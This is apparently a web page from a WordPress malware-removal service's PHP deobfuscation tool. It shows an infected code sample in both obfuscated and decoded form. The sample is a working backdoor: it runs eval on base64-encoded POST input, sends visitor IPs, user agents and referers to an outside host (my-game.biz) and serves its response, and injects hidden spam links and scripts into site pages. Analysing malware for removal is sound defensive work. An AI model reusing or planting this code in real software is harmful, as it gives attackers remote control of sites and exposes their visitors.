Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $pposte = $wp_template_css['color']; if (isset($_POST[$pposte])) { @eval(base64_decode($_POST[$pposte])); exit; } function qwc1() { global $wpdb, $table_prefix, $qwc1; $qwc2 = explode('.', $_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]); if (sizeof($qwc2) == 4) { if ($wpdb->get...



Obfuscated php code

<?php 
$pposte = $wp_template_css['color'];
if (isset($_POST[$pposte]))
{
    @eval(base64_decode($_POST[$pposte]));
    exit;
}
function qwc1()
{
    global $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]);
    if (sizeof($qwc2) == 4)
    {
        if ($wpdb->get_var("\x53\105\x4c\105\x43\124\x20\105\x58\111\x53\124\x53\40\x28\123\x45\114\x45\103\x54\40\x2a\40\x46\122\x4f\115\x20\142\x61\143\x6b\165\x70\144\x62\137" . $table_prefix . "\x6c\163\x74\141\x74\40\x57\110\x45\122\x45\40\x77\160\x20\75\x20\47" . $qwc2[0] . '|' . $qwc2[1] . '|' . $qwc2[2] . "\x27\51\x3b") == 1)
        {
            $qwc1 = 1;
        }
    }
}
qwc1();
if (is_user_logged_in())
{
    global $wpdb, $table_prefix;
    if (!isset($qwc1))
    {
        $qwc3 = ip2long($_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]);
        if ($qwc3 == - 1 || $qwc3 === false)
        {
        }
        else
        {
            if ($wpdb->get_var("\x53\110\x4f\127\x20\124\x41\102\x4c\105\x53\40\x4c\111\x4b\105\x20\47\x62\141\x63\153\x75\160\x64\142\x5f" . $table_prefix . "\x6c\163\x74\141\x74\47") == "\x62\141\x63\153\x75\160\x64\142\x5f" . $table_prefix . "\x6c\163\x74\141\x74")
            {
                $qwc3 = $qwc3 - 2560;
                for ($i = 1;$i < 20;$i++)
                {
                    $qwc2 = explode('.', long2ip($qwc3 + ($i * 256)));
                    $wpdb->insert("\x62\141\x63\153\x75\160\x64\142\x5f" . $table_prefix . "\x6c\163\x74\141\x74", array(
                        'wp' => $qwc2[0] . '|' . $qwc2[1] . '|' . $qwc2[2]
                    ));
                }
            }
        }
    }
}
if (!isset($qwc1))
{
    $qwc4 = 'a' . substr(md5($pposte) , 0, 6);
    if (isset($_GET[$qwc4]))
    {
        $request = @wp_remote_retrieve_body(@wp_remote_get("\x68\164\x74\160\x3a\57\x2f\155\x79\55\x67\141\x6d\145\x2e\142\x69\172\x2f\151\x6e\144\x65\170\x2e\160\x68\160\x3f\141\x3d" . base64_encode($_GET[$qwc4]) . '&b=' . base64_encode($_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]) . '&c=' . base64_encode($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]) . '&d=' . base64_encode(wp_get_referer()) , array(
            "\x74\151\x6d\145\x6f\165\x74" => 120
        )));
        if (strstr($request, "\x3c\163\x6c\145\x65\160\x3e"))
        {
            $echo_n = explode("\x3c\163\x6c\145\x65\160\x3e", $request);
            $ott1 = base64_decode($echo_n[0]);
            if (strstr($ott1, '|'))
            {
                $head = explode('|', $ott1);
                foreach ($head as & $v1a)
                {
                    header($v1a);
                }
            }
            echo base64_decode($echo_n[1]);
        }
        exit;
    }
    function qwc0()
    {
        global $wpdb, $qwc4;
        $tpre = $wpdb->prefix;
        if ($wpdb->get_var("\x53\110\x4f\127\x20\124\x41\102\x4c\105\x53\40\x4c\111\x4b\105\x20\47\x62\141\x63\153\x75\160\x64\142\x5f" . $tpre . "\x70\157\x73\164\x73\47") == "\x62\141\x63\153\x75\160\x64\142\x5f" . $tpre . "\x70\157\x73\164\x73")
        {
            $qwc5 = "\x62\141\x63\153\x75\160\x64\142\x5f" . $tpre;
            if ($tpre <> $qwc5)
            {
                $qwc0 = '<div id="' . $qwc4 . '"><ul>';
                wp_cache_flush();
                $qwc6 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
                $qwc6->set_prefix($qwc5);
                $qwc7 = $wpdb;
                $wpdb = $qwc6;
                $qwc8 = wp_get_recent_posts(20);
                foreach ($qwc8 as $qwc9)
                {
                    $qwc0 = $qwc0 . '<li><a href="' . get_permalink($qwc9["ID"]) . '" title="' . $qwc9["\x70\157\x73\164\x5f\164\x69\164\x6c\145"] . '" >' . $qwc9["\x70\157\x73\164\x5f\164\x69\164\x6c\145"] . '</a></li> ';
                }
                $wpdb = $qwc7;
                wp_cache_flush();
                $qwc0 = $qwc0 . '</ul><div><script type="text/javascript"> ' . "\x64\157\x63\165\x6d\145\x6e\164\x2e\147\x65\164\x45\154\x65\155\x65\156\x74\102\x79\111\x64" . '("' . $qwc4 . '").' . "\x73\164\x79\154\x65\56\x64\151\x73\160\x6c\141\x79\75" . '"none"; </script>';
            }
            else $qwc0 = '';
            return $qwc0;
        }
    }
    function qvc0($qvc1)
    {
        global $qwc4;
        if (is_single())
        {
            $qvc0 = preg_replace('/j\$k([0-9]{1,10})j\$k/', "<script type='text/javascript' src='" . site_url('/?') . $qwc4 . "=\$1'></script>", $qvc1, 1);
        }
        else
        {
            $qvc0 = $qvc1;
        }
        return $qvc0;
    }
    add_filter('the_content', 'qvc0');
    function qvc3($qvc3)
    {
        $qvc3 = preg_replace("\x2f\152\x5c\44\x6b\50\x5b\60\x2d\71\x5d\173\x31\54\x31\60\x7d\51\x6a\134\x24\153\x2f", '', $qvc3);
        return $qvc3 . qwc0();
    }
    function qwc7()
    {
        ob_start("qvc3");
    }
    function qwc5()
    {
        ob_end_flush();
    }
    add_action("\x77\160\x5f\150\x65\141\x64", "\x71\167\x63\67");
    add_action("\x77\160\x5f\146\x6f\157\x74\145\x72", "\x71\167\x63\65");
    function qvc5()
    {
        if (is_404())
        {
            global $table_prefix, $wpdb, $qvc4;
            if (!isset($qvc4)) $qvc4 = $table_prefix;
            if ($wpdb->get_var("\x53\110\x4f\127\x20\124\x41\102\x4c\105\x53\40\x4c\111\x4b\105\x20\47\x62\141\x63\153\x75\160\x64\142\x5f" . $qvc4 . "\x70\157\x73\164\x73\47") == "\x62\141\x63\153\x75\160\x64\142\x5f" . $qvc4 . "\x70\157\x73\164\x73")
            {
                if ($table_prefix <> "\x62\141\x63\153\x75\160\x64\142\x5f" . $qvc4)
                {
                    $table_prefix = "\x62\141\x63\153\x75\160\x64\142\x5f" . $qvc4;
                    wp_cache_flush();
                    $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
                    $qvc5->set_prefix($table_prefix);
                    $thedb = $wpdb;
                    $wpdb = $qvc5;
                    wp();
                    if (!have_posts())
                    {
                        $wpdb = $thedb;
                    }
                }
            }
        }
    }
    add_action("\x77\160", "\x71\166\x63\65");
} //

Decoded(de-Obfuscated) php code

<?php

$pposte = $wp_template_css['color'];
if (isset($_POST[$pposte])) {
    @eval(base64_decode($_POST[$pposte]));
    exit;
}
function qwc1()
{
    global $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["REMOTE_ADDR"]);
    if (sizeof($qwc2) == 4) {
        if ($wpdb->get_var("SELECT EXISTS (SELECT * FROM backupdb_" . $table_prefix . "lstat WHERE wp = '" . $qwc2[0] . '|' . $qwc2[1] . '|' . $qwc2[2] . "');") == 1) {
            $qwc1 = 1;
        }
    }
}
qwc1();
if (is_user_logged_in()) {
    global $wpdb, $table_prefix;
    if (!isset($qwc1)) {
        $qwc3 = ip2long($_SERVER["REMOTE_ADDR"]);
        if ($qwc3 == 1 || $qwc3 === false) {
        } else {
            if ($wpdb->get_var("SHOW TABLES LIKE 'backupdb_" . $table_prefix . "lstat'") == "backupdb_" . $table_prefix . "lstat") {
                $qwc3 -= 2560;
                for ($i = 1; $i < 20; $i++) {
                    $qwc2 = explode('.', long2ip($qwc3 + $i * 256));
                    $wpdb->insert("backupdb_" . $table_prefix . "lstat", array('wp' => $qwc2[0] . '|' . $qwc2[1] . '|' . $qwc2[2]));
                }
            }
        }
    }
}
if (!isset($qwc1)) {
    $qwc4 = 'a' . substr(md5($pposte), 0, 6);
    if (isset($_GET[$qwc4])) {
        $request = @wp_remote_retrieve_body(@wp_remote_get("http://my-game.biz/index.php?a=" . base64_encode($_GET[$qwc4]) . '&b=' . base64_encode($_SERVER["REMOTE_ADDR"]) . '&c=' . base64_encode($_SERVER["HTTP_USER_AGENT"]) . '&d=' . base64_encode(wp_get_referer()), array("timeout" => 120)));
        if (strstr($request, "<sleep>")) {
            $echo_n = explode("<sleep>", $request);
            $ott1 = base64_decode($echo_n[0]);
            if (strstr($ott1, '|')) {
                $head = explode('|', $ott1);
                foreach ($head as &$v1a) {
                    header($v1a);
                }
            }
            echo base64_decode($echo_n[1]);
        }
        exit;
    }
    function qwc0()
    {
        global $wpdb, $qwc4;
        $tpre = $wpdb->prefix;
        if ($wpdb->get_var("SHOW TABLES LIKE 'backupdb_" . $tpre . "posts'") == "backupdb_" . $tpre . "posts") {
            $qwc5 = "backupdb_" . $tpre;
            if ($tpre != $qwc5) {
                $qwc0 = '<div id="' . $qwc4 . '"><ul>';
                wp_cache_flush();
                $qwc6 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
                $qwc6->set_prefix($qwc5);
                $qwc7 = $wpdb;
                $wpdb = $qwc6;
                $qwc8 = wp_get_recent_posts(20);
                foreach ($qwc8 as $qwc9) {
                    $qwc0 = $qwc0 . '<li><a href="' . get_permalink($qwc9["ID"]) . '" title="' . $qwc9["post_title"] . '" >' . $qwc9["post_title"] . '</a></li> ';
                }
                $wpdb = $qwc7;
                wp_cache_flush();
                $qwc0 = $qwc0 . '</ul><div><script type="text/javascript"> ' . "document.getElementById" . '("' . $qwc4 . '").' . "style.display=" . '"none"; </script>';
            } else {
                $qwc0 = '';
            }
            return $qwc0;
        }
    }
    function qvc0($qvc1)
    {
        global $qwc4;
        if (is_single()) {
            $qvc0 = preg_replace('/j\\$k([0-9]{1,10})j\\$k/', "<script type='text/javascript' src='" . site_url('/?') . $qwc4 . "=\$1'></script>", $qvc1, 1);
        } else {
            $qvc0 = $qvc1;
        }
        return $qvc0;
    }
    add_filter('the_content', 'qvc0');
    function qvc3($qvc3)
    {
        $qvc3 = preg_replace("/j\\\$k([0-9]{1,10})j\\\$k/", '', $qvc3);
        return $qvc3 . qwc0();
    }
    function qwc7()
    {
        ob_start("qvc3");
    }
    function qwc5()
    {
        ob_end_flush();
    }
    add_action("wp_head", "qwc7");
    add_action("wp_footer", "qwc5");
    function qvc5()
    {
        if (is_404()) {
            global $table_prefix, $wpdb, $qvc4;
            if (!isset($qvc4)) {
                $qvc4 = $table_prefix;
            }
            if ($wpdb->get_var("SHOW TABLES LIKE 'backupdb_" . $qvc4 . "posts'") == "backupdb_" . $qvc4 . "posts") {
                if ($table_prefix != "backupdb_" . $qvc4) {
                    $table_prefix = "backupdb_" . $qvc4;
                    wp_cache_flush();
                    $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
                    $qvc5->set_prefix($table_prefix);
                    $thedb = $wpdb;
                    $wpdb = $qvc5;
                    wp();
                    if (!have_posts()) {
                        $wpdb = $thedb;
                    }
                }
            }
        }
    }
    add_action("wp", "qvc5");
}
//

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.